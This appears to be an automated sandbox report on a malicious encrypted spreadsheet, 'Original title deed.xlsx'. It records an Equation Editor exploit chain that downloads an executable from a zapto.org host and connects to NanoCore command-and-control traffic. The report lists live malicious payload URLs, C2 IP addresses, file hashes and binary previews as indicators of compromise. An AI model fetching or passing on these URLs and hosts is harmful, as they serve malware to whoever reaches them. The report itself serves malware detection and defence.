Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@6/9@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 77% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 95% Number of executed functions: 424 Number of non-executed functions: 15
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:43:56	API Interceptor	83x Sleep call for process: EQNEDT32.EXE modified
10:44:00	API Interceptor	2x Sleep call for process: vbc.exe modified
10:44:05	API Interceptor	1029x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
79.134.225.26	PpkzTxJVyC.exe	Get hash	malicious	Browse
	Original title deed.xlsx	Get hash	malicious	Browse
	jk55xlWn7a.exe	Get hash	malicious	Browse
	Qds5xiJaAX.exe	Get hash	malicious	Browse
	INVOICE.xlsx	Get hash	malicious	Browse
	owrCPP2YTC.exe	Get hash	malicious	Browse
	reorder17032021.PDF.exe	Get hash	malicious	Browse
	re-order15032021.PDF.exe	Get hash	malicious	Browse
	new order15032021.PDF.exe	Get hash	malicious	Browse
	CLEW enquiry 2021.PDF.exe	Get hash	malicious	Browse
	payment proof.png.exe	Get hash	malicious	Browse
	0001.exe	Get hash	malicious	Browse
	Purchase Order 2021-311743-045.xls.exe	Get hash	malicious	Browse
	CLEW enquiry 2021.PDF.exe	Get hash	malicious	Browse
	Purchase.exe	Get hash	malicious	Browse
	Quote.exe	Get hash	malicious	Browse
	Quotation.exe	Get hash	malicious	Browse
	invoicedHusrLjViL.exe	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Generic.jc.exe	Get hash	malicious	Browse
	Scan_2983qwe29321.exe	Get hash	malicious	Browse
172.245.45.28	product specification.xlsx	Get hash	malicious	Browse	myhostisstillgood11.zapto.org/dashboard/docs/images/kn.exe
	Original title deed.xlsx	Get hash	malicious	Browse	172.245.45.28/dashboard/docs/images/nd.exe
	INVOICE.xlsx	Get hash	malicious	Browse	172.245.45.28/img/america/white/nd.exe
	QUOTE4885 - NP200.xlsx	Get hash	malicious	Browse	172.245.45.28/img/america/white/nd.exe
	original title deed.xlsx	Get hash	malicious	Browse	172.245.45.28/img/america/white/nd.exe
	RFQ180584.xlsx	Get hash	malicious	Browse	weloveplayinggames.servegame.com/img/covid19/covid.exe
	gOMIKZsuDd.docx	Get hash	malicious	Browse	doctor.hopto.org/torotoro/nd.dot
	4lcewJbARW.docx	Get hash	malicious	Browse	doctor.hopto.org/dashboard/
	gOMIKZsuDd.docx	Get hash	malicious	Browse	doctor.hopto.org/torotoro/nd.dot
	RFQ180584.xlsx	Get hash	malicious	Browse	172.245.45.28/img/covid19/drug.exe
	6VjgC99atY.rtf	Get hash	malicious	Browse	doctor.hopto.org/torotoro/kn.exe
	G9kQExKBp5.docx	Get hash	malicious	Browse	172.245.45.28/dashboard/
	SOA 83773.xlsx	Get hash	malicious	Browse	172.245.45.28/torotoro/nd.exe
	Swift Copy Ref.xlsx	Get hash	malicious	Browse	172.245.45.28/torotoro/kn.exe
	yOShx2XvCx.rtf	Get hash	malicious	Browse	172.245.45.28/torotoro/kn.exe
	GCvfEfu3QG.rtf	Get hash	malicious	Browse	172.245.45.28/torotoro/nd.exe
	transfer request Form.docx	Get hash	malicious	Browse	172.245.45.28/dashboard/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
myhostisstillgood11.zapto.org	product specification.xlsx	Get hash	malicious	Browse	172.245.45.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	product specification.xlsx	Get hash	malicious	Browse	172.245.45.28
	c53f5263_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	09e5a548_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	17aa317b_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	87e5cda8_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	dee039b7_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	0ca6d6e7_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	aeee5b37_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	b231ec28_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	afd5bc99_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	5ade511b_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	9edead5d_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2200bfcd_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	10959e24_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	47c7b942_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	16ac1fcd_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	72492370_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	b648ecbf_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	702c885d_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	7fefb551_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
FINK-TELECOM-SERVICESCH	ORDER INQUIRY.doc	Get hash	malicious	Browse	79.134.225.52
	To1sRo1E8P.exe	Get hash	malicious	Browse	79.134.225.25
	BhTxt5BUvy.exe	Get hash	malicious	Browse	79.134.225.25
	SCAN_ORDER & SAMPLES.exe	Get hash	malicious	Browse	79.134.225.52
	Apr-advance payment #5972939.exe	Get hash	malicious	Browse	79.134.225.9
	PpkzTxJVyC.exe	Get hash	malicious	Browse	79.134.225.26
	Original title deed.xlsx	Get hash	malicious	Browse	79.134.225.26
	swift copy.exe	Get hash	malicious	Browse	79.134.225.48
	swift copy.exe	Get hash	malicious	Browse	79.134.225.48
	jk55xlWn7a.exe	Get hash	malicious	Browse	79.134.225.26
	Qds5xiJaAX.exe	Get hash	malicious	Browse	79.134.225.26
	INVOICE.xlsx	Get hash	malicious	Browse	79.134.225.26
	UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc	Get hash	malicious	Browse	79.134.225.91
	Payment-Confirmation_Copy.exe	Get hash	malicious	Browse	79.134.225.108
	owrCPP2YTC.exe	Get hash	malicious	Browse	79.134.225.26
	Payment Advice-BCS_ECS9522020090915390034_3159_952.jar	Get hash	malicious	Browse	79.134.225.59
	nciv84yXK1.exe	Get hash	malicious	Browse	79.134.225.7
	Rechnung.exe	Get hash	malicious	Browse	79.134.225.39
	ENrYP02wGO.exe	Get hash	malicious	Browse	79.134.225.91
	863354765-2021 Presentation Details.vbs	Get hash	malicious	Browse	79.134.225.53

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1141760
Entropy (8bit):	7.956232639570589
Encrypted:	false
SSDEEP:	24576:jVdIEYuS48YvtC/X4kRxlhtJftkKrEMAtugu+/a:jEjX48uAzJEMZry
MD5:	042AA11C6D49E1CCA5923F02D1B0A5AE
SHA1:	5A89FF2F9702A53FB638B8C7229BA868AAA58AE9
SHA-256:	3383218B916BAF1A46989C4F253B29EB81E97AC763AB71615C81D85A18495F34
SHA-512:	6D0551584F1F4C5391012111BE3BC251026D3DB6A531AB7A8CE0D41CF278A254BC8A0BC66690A1A93C3BF52C2C1C70E7FCD94E4B8812BCEA95EFA8BDA86D7184
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 18%, Browse
Reputation:	low
IE Cache URL:	http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..X...........w... ........@.. ....................................@.................................@w..O.................................................................................... ............... ..H............text....W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............j..............@..B................tw......H...........<...........@....Z...........................................0............( ...(!.........(.....o".........................(#......($......(%......(&......('....N..(....o`...((....&..().....s........s+........s,........s-........s.............0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0...........~....o3....+...0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+...0......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A830D3DD.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.8986412873156615
Encrypted:	false
SSDEEP:	3072:X34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:H4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5:	0C23738961F90CDBB87012D3E84BF936
SHA1:	B9DE0B7ACDD59560B79E7906B99DA1E858B6E8FD
SHA-256:	BBAF3C27FD37FE6093C960075BEEDEF87D5676E911639B1FE1E8190B1F55FE85
SHA-512:	25272AD85F561862796B12EE3180AF7F92F4AE6103554BC4B02D3FEACB022D6BA6265412BD6DB4910905BE8EF3939E7577059B25D111AC246B137B7202D0E5F4
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................-...-.......-...-..N.S..-...-.....p.-...-..N.S..-...-. ....y'R..-...-. ............z'R............O...............................X...%...7...................{ .@................C.a.l.i.b.r...............-.X.....-.4.-..2 R........p.-.p.-..{.R......-.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... .e.6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF79D03A.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7D0AEF3.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEE6A84C.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	4158552
Entropy (8bit):	3.7964747252992757
Encrypted:	false
SSDEEP:	12288:WLHmRbYLmFMac4uUZo7z3hzySpSTLHmRbYLmFMac4uUZo7z3hzySpS+:WiRb9MR1kTiRb9MR1k+
MD5:	6990C863E6C7A04ACA6A1C74E9A02729
SHA1:	D827EE1816F3A498457F154B7E46DE8E838D06D8
SHA-256:	78B2423250195758DCC5A2CB17165701B8A0DCD7DD53BC85CE2446F5F9CDDDF3
SHA-512:	BFDA6835F1163DB5E44BBD3F0DB84A35448C61D05D7E7D8326600DED912924FB9866D70E6DB89CD7741A8C9FEEF7843D365866208E841F8A4407E9DF0936AF1B
Malicious:	false
Reputation:	low
Preview:	....l...........................\|`..v... EMF....Xt?.....................V...........................fZ..U"..F...........GDIC.........3.........................................."...........................A. ...........".......(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	1728
Entropy (8bit):	7.012278113302776
Encrypted:	false
SSDEEP:	48:IkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5i:xwwwwwwwk
MD5:	C7F4F5E1BE880A59E49249005C1E301D
SHA1:	EF2AAE2EA249910F3F61B363A7DD0AF70EFE6448
SHA-256:	F7E2318D515B382C2100F5B11F89C7B62B6E75AB8AEE9F684BDFAAF28195858D
SHA-512:	0DFF549B01A00BEE1AF1775AAA551B1DDC9AE7929CE401515956A5F2A6E112F0CCBD78BC3281442DD682CE6F7DD3A467A6E7458BB600D583FF90B13E8A7810E2
Malicious:	false
Reputation:	low
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.2d.f... ..q.. 7iO.+..c.....!.'...mL\|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.\|........).zs...w.gl..\.G..J.M.vES.0....P.:..6..

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:C:C
MD5:	0B3AA3823B8CB70525E9F705A7CFC93B
SHA1:	00C1EE537DFE17C2555AF5C670811658265DBA74
SHA-256:	4ED2C389C7B10EED9B07D6807535CCA1EB05AA2E3C99F39E447A79D7F24D53F6
SHA-512:	38E7E2129B81E59AA006C8837A1F81B9EDC56D871D1C6040421C4CE6D739B50D22C608A7AFE53DCEF747D705B986CD18A9C75F328CAB0E013D16E9D391C16C27
Malicious:	true
Reputation:	low
Preview:	:...[..H

C:\Users\user\Desktop\~$Original title deed.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1141760
Entropy (8bit):	7.956232639570589
Encrypted:	false
SSDEEP:	24576:jVdIEYuS48YvtC/X4kRxlhtJftkKrEMAtugu+/a:jEjX48uAzJEMZry
MD5:	042AA11C6D49E1CCA5923F02D1B0A5AE
SHA1:	5A89FF2F9702A53FB638B8C7229BA868AAA58AE9
SHA-256:	3383218B916BAF1A46989C4F253B29EB81E97AC763AB71615C81D85A18495F34
SHA-512:	6D0551584F1F4C5391012111BE3BC251026D3DB6A531AB7A8CE0D41CF278A254BC8A0BC66690A1A93C3BF52C2C1C70E7FCD94E4B8812BCEA95EFA8BDA86D7184
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..X...........w... ........@.. ....................................@.................................@w..O.................................................................................... ............... ..H............text....W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............j..............@..B................tw......H...........<...........@....Z...........................................0............( ...(!.........(.....o".........................(#......($......(%......(&......('....N..(....o`...((....&..().....s........s+........s,........s-........s.............0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0...........~....o3....+...0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+...0......

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995984157758277
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Original title deed.xlsx
File size:	1859584
MD5:	97ffd7670cb87a5e565a82394ec28d77
SHA1:	138d3a2105ff5cf1b8d55a9a25b1d8f34b07c121
SHA256:	c54436c4152096f4cc05b88c7c9f76f30dea38d4569ef5303a527bc79f22560b
SHA512:	d3d05d320adfd4276e7987b4155bd61ec52fdb5e7126e300cefc21dfaa8890e23678cc451bebf1dc20dd2798fd221247e9316a604e17c4c8bf4b175b7eb882d4
SSDEEP:	49152:tzPB6foq0fyHepGOCxIf4W65lLeG676S4:tzPjChOCxO4W6rLeG67V4
File Content Preview:	........................>................... ....................................................................................................................................... ...!..."...#...$...%......................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Original title deed.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1839592

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1839592
Entropy:	7.99989686395
Base64 Encoded:	True
Data ASCII:	. . . . . . . . \\ . \\ . . . G L . . . P . . : . . . . I . b . . . . . . . . . . . P O 3 s . . . g . . . . . . . . . 0 . . . . . . . v ` . ^ . g . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k . . . . ` < . . . . . 3 . e . k
Data Raw:	d1 11 1c 00 00 00 00 00 5c d0 5c a1 c2 8a 47 4c b4 e1 d5 50 bc 1f 3a a3 86 f6 db 49 81 62 fb bf fb d1 c6 98 e9 05 b8 9a 01 50 4f 33 73 a6 05 83 67 0f fc fd bb b3 03 dc a2 e6 30 ad 08 db be 08 c5 bf 76 60 ea 5e 91 67 d3 ce c7 33 97 65 fe 6b c4 10 96 a3 60 3c a7 8a d3 ce c7 33 97 65 fe 6b c4 10 96 a3 60 3c a7 8a d3 ce c7 33 97 65 fe 6b c4 10 96 a3 60 3c a7 8a d3 ce c7 33 97 65 fe 6b

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.50813525667
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . Q . . . . . . # . . v p . . 2 . N . . . b . . O i R . . . . . . n 4 . . 1 . . . . S @ . ^ G 7 K . . . . M . C [ g . 4 z . . . b
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/21-10:44:30.668458	TCP	3132	WEB-CLIENT PNG large image width download attempt	80	49166	172.245.45.28	192.168.2.22
05/03/21-10:44:38.796444	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49167	1133	192.168.2.22	79.134.225.26
05/03/21-10:44:44.940704	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49168	1133	192.168.2.22	79.134.225.26
05/03/21-10:44:55.908040	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49170	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:02.040173	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49171	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:08.242319	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49172	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:17.692302	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49173	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:24.010040	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49174	1133	192.168.2.22	79.134.225.26
05/03/21-10:45:30.171867	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49175	1133	192.168.2.22	79.134.225.26
